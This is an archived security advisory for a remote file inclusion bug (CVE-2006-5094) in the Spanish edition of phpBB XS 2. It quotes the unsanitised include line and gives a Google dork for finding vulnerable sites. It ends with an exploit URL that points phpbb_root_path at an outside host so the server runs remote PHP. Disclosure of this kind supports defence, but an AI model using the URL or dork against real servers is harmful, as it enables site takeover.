Bug: phpBB XS 2 spain version (phpbb_root_path) Remote File Inclusion ( Ascii Version )

Search:
WLB2

phpBB XS 2 spain version (phpbb_root_path) Remote File Inclusion

Published
Credit
Risk
2006.10.03
chris hasibuan
High
CWE
CVE
Local
Remote
N/A
CVE-2006-5094
No
Yes
 Dork: "Traduccion Espanol por phpBB-Es"

CVSS Base Score
Impact Subscore
Exploitability Subscore
5.1/10
6.4/10
4.9/10
Exploit range
Attack complexity
Authentication
Remote
High
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

#############################SolpotCrew Community################################

#

# phpBB XS 2 spain version (phpbb_root_path) Remote File Inclusion

#

# Download : http://www.elanzuelo.es/phpbb.tar.gz

#

########################################################################
#########

#

#

# Bug Found By :Solpot a.k.a (k. Hasibuan) (28-09-2006)

#

# contact: chris_hasibuan (at) yahoo (dot) com [email concealed]

#

# Website : http://www.nyubicrew.org/adv/solpot-adv-10.txt

#

########################################################################
########

#

#

# Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid ,Noordin`M`TOP

# robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa

# home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo

# Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX

# x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ , Soey , vend3r , k1tk4t

# [K]ompoR_Meledu[K] , Scr3W_W0rM , TOMMY^PENGAMEN , Belaj4r, ^NakKuta

# and all member solpotcrew community @ http://nyubicrew.org/forum/

# especially thx to str0ke @ milw0rm.com

#

########################################################################
#######

Input passed to the "phpbb_root_path" is not properly verified

before being used to include files. This can be exploited to execute

arbitrary PHP code by including files from local or external resources.

code from includes/functions_kb.php

/***********************************************************************
****

*

* This program is free software; you can redistribute it and/or modify

* it under the terms of the GNU General Public License as published by

* the Free Software Foundation; either version 2 of the License, or

* (at your option) any later version.

*

*

************************************************************************
***/

//

// get_quick_stats();

// gets number of articles

//

include_once($phpbb_root_path.'includes/functions_color_groups.'.$phpEx)
;

function get_quick_stats()

Google Dork : "Traduccion Espanol por phpBB-Es"

Exploit : http://somehost/path_to_phpbbXS2/includes/functions_kb.php?phpbb_root_pa
th=http://injek-pala-lappet?

##############################MY LOVE JUST FOR U RIE#########################

######################################E.O.F#############################
#####

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version